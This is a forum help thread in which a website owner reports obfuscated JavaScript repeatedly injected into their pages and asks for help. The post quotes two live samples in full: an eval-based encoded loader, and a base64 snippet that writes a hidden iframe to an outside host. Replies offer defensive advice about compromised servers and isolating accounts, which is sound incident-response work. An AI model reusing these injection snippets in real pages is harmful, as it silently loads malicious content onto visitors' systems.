itindia
asked on
Injecting Javascript code in webpage after body tag. which download maliculous script into system
I don't know what's happening with my web server and websites. Somebody injecting some javascript code into the webpages after the body tag. When someone try to open the websiet it downloads the scripts and inject into the system. I tried to delete all hosted website and uploaded it again but no luck.
Could someone suggest me on this....
Here is the sample code of that javascript : -
Could someone suggest me on this....
Here is the sample code of that javascript : -
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG') </script><!-- makemecharming.com --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");
</script>
silemone
when you say someone, you mean your webhost or another programmer?
ASKER
Thanks for the quick reply!! But I don't know who is the culprit as i am the only person who has the access of the websites, i meant by "Someone" that there could be a Hijacker or may me some virus who has attacked on my websites.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
yes Tiggerito Its directly injected on the server, no user modification has been done. Its spreading the code in all HTMl, ASP and PHP files located in the server in which the tag is exists. Basically its a virus, If someone opens the website that code execute and pointed to another URL and make your PC un-responding.
No way you can stop it but to press ESC before executing or you have to do a system restore.
I keep removing the codes from files but after some days the same thing will happen.
No way you can stop it but to press ESC before executing or you have to do a system restore.
I keep removing the codes from files but after some days the same thing will happen.
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.
You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.
You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.
Most likely your server isn't compromised but one of your scripts is being abused, the abused script will have access to all files under the same user account. Start by giving each domain it's own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself then apply Tiggerito his suggestion.